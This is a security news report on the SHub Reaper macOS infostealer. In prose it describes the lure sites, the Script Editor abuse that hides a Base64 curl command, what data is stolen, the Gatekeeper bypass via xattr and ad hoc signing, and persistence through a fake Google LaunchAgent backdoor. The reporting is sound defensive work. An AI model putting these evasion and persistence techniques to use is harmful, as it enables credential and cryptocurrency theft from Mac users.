A new macOS infostealer called SHub Reaper spoofs Apple, Google, and Microsoft at different stages of a single attack chain, using a fake Apple security update to trick users into handing over passwords and installing a persistent backdoor.
SentinelOne researcher Phil Stokes documented the variant on May 18, describing it as a major evolution of the SHub Stealer family that has circulated through macOS-focused criminal campaigns for two years. What makes Reaper different: the infection chain changes its disguise at every stage. The attack starts with fake WeChat or Miro installer websites hosted on typo-squatted domains, including mlcrosoft[.]co[.]com. These pages fingerprint visitors before delivering the payload, collecting IP addresses, WebGL data, VPN indicators, and installed browser extensions. The scripts specifically look for password managers including 1Password, Bitwarden, and LastPass, plus cryptocurrency wallets such as MetaMask and Phantom.
Instead of the usual "ClickFix" trick that pushes victims into pasting commands into Terminal, Reaper uses the applescript:// URL scheme to launch macOS Script Editor with the malicious script pre-loaded. The shift bypasses Apple's Tahoe 26.4 mitigation for Terminal-based attack chains. The script is padded with ASCII art and fake installer text so the dangerous command sits below the visible window. When a victim clicks "Run," the script displays a fake update referencing Apple's XProtectRemediator tool while silently decoding and executing a Base64-encoded curl command in the background. The malware checks for Russian input sources, and if the system appears to be in the CIS region, it sends a cis_blocked event to its C2 server and exits.
Reaper targets credentials and data from Chrome, Firefox, Brave, Edge, Opera, Vivaldi, Arc, and Orion, plus desktop wallets including Exodus, Atomic, Ledger Live, Electrum, and Trezor Suite. It also steals macOS Keychain data, Telegram sessions, and developer configuration files. A new AMOS-style Filegrabber routine searches Desktop and Documents folders for files with business or financial value (docx, xlsx, json, wallet, rdp, and others under 2MB, plus PNG images under 6MB). The collection is capped at 150MB.
If the staged data exceeds 85MB, the malware splits it into 70MB ZIP chunks for sequential upload.
After exfiltration, Reaper tries to compromise cryptocurrency wallet applications directly. It terminates active wallet processes, downloads a modified app.asar file from the C2 server, and replaces the legitimate application core. To bypass Gatekeeper, the script clears quarantine attributes using xattr -cr and applies ad hoc code signing. The most change from earlier SHub builds is persistence. Reaper creates a directory structure mimicking Google Software Update at ~/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/ and places a Base64-decoded bash script named GoogleUpdate inside. A LaunchAgent property list named com.google.keystone.agent.plist executes the script every 60 seconds. The beacon sends system details to the C2's /api/bot/heartbeat endpoint. If the server returns a "code" payload, the script decodes it, writes it to a hidden file, executes it with the current user's privileges, and deletes it.
This gives the attacker a persistent backdoor for remote code execution.
"Alongside an AMOS-style Filegrabber and chunked uploads, the variant also installs a persistent backdoor, giving the operators more ways to steal data or pivot to other malicious installs after the initial compromise," Stokes said. The malware layers trusted brands at each stage, a fake WeChat installer, delivery from a typo-squatted Microsoft domain, execution disguised as an Apple security update, and persistence hidden inside a fake Google directory. Mac users should avoid running scripts from untrusted sites, ignore unsolicited "security update" prompts, and verify URLs before downloading software.
